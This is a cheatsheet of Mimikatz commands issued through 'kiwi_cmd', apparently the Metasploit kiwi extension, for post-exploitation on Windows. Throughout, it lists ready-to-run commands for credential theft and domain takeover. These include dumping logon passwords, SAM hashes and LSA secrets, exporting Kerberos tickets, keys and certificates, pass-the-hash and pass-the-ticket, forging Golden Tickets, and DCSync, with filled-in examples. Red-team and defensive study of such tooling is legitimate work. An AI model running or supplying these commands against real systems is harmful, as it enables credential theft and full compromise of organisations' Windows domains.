Kiwi (Mimikatz) Cheatsheet

General Commands

  1. Enable Debug Privileges:
    kiwi_cmd "privilege::debug"
    • Use: To enable debug privileges for the session, which is required for many Mimikatz operations.
  2. Log Operations:
    kiwi_cmd "log"
    • Use: To start logging operations.
    kiwi_cmd "log [log_file]"
    • Use: To read log operations from the specified log file.
    • Example: kiwi_cmd "log read.log"

Sekurlsa Commands

  1. Retrieve Logon Passwords:
    kiwi_cmd "sekurlsa::logonpasswords"
    • Use: To display all available logon passwords.
    kiwi_cmd "sekurlsa::logonPasswords full"
    • Use: To display detailed logon password information.
  2. Export Kerberos Tickets:
    kiwi_cmd "sekurlsa::tickets /export"
    • Use: To export all Kerberos tickets.
  3. Pass the Hash:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm_hash] /run:[command]"
    • Use: To perform a pass-the-hash attack.
    • Example: kiwi_cmd "sekurlsa::pth /user:Administrator /domain:example.com /ntlm:abc123... /run:cmd"

Kerberos Commands

  1. List and Export Tickets:
    kiwi_cmd "kerberos::list /export"
    • Use: To list and export Kerberos tickets.
  2. Pass the Ticket:
    kiwi_cmd "kerberos::ptt [ticket_file]"
    • Use: To pass a Kerberos ticket.
    • Example: kiwi_cmd "kerberos::ptt c:\ticket.kirbi"
  3. Golden Ticket:
    kiwi_cmd "kerberos::golden /user:[username] /domain:[domain] /sid:[sid] /krbtgt:[krbtgt_hash] /ticket:[ticket_file]"
    • Use: To create and use a Golden Ticket.
    • Example: kiwi_cmd "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-... /krbtgt:123456... /ticket:golden.kirbi"

Crypto Commands

  1. Export Certificates and Keys:
    kiwi_cmd "crypto::certificates /export"
    • Use: To export certificates.
    kiwi_cmd "crypto::keys /export"
    • Use: To export cryptographic keys.

Vault and LSADump Commands

  1. Retrieve Credentials from Windows Vault:
    kiwi_cmd "vault::cred"
    • Use: To list credentials stored in Windows Vault.
  2. Elevate Token:
    kiwi_cmd "token::elevate"
    • Use: To elevate the current token privileges.
  3. Dump SAM Database:
    kiwi_cmd "lsadump::sam"
    • Use: To dump the SAM database for password hashes.
  4. Dump LSA Secrets:
    kiwi_cmd "lsadump::secrets"
    • Use: To dump LSA secrets.
  5. DC Sync:
    kiwi_cmd "lsadump::dcsync /user:[domain\username] /domain:[domain]"
    • Use: To perform a DC Sync attack and retrieve hashes.
    • Example: kiwi_cmd "lsadump::dcsync /user:example\krbtgt /domain:example.com"

Pass-the-Hash Commands

  1. Perform Pass-the-Hash with NTLM:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm_hash]"
    • Use: To perform a pass-the-hash attack using NTLM hash.
  2. Perform Pass-the-Hash with AES:
    kiwi_cmd "sekurlsa::pth /user:[username] /domain:[domain] /aes256:[aes256_hash]"
    • Use: To perform a pass-the-hash attack using AES256 hash.

Miscellaneous Commands

  1. Retrieve Encryption Keys:
    kiwi_cmd "sekurlsa::ekeys"
    • Use: To list encryption keys.
  2. DPAPI Commands:
    kiwi_cmd "sekurlsa::dpapi"
    • Use: To interact with DPAPI (Data Protection API).
  3. Load Minidump:
    kiwi_cmd "sekurlsa::minidump [dmp_file]"
    • Use: To load a minidump file.
    • Example: kiwi_cmd "sekurlsa::minidump lsass.dmp"
  4. Kerberos Ticket Granting Ticket:
    kiwi_cmd "kerberos::tgt"
    • Use: To retrieve the TGT (Ticket Granting Ticket).
  5. Purge Tickets:
    kiwi_cmd "kerberos::purge"
    • Use: To purge all Kerberos tickets.

By replacing specific values with generic placeholders and noting when each command applies, this cheatsheet should make kiwi_cmd easier to use for the various post-exploitation tasks listed above.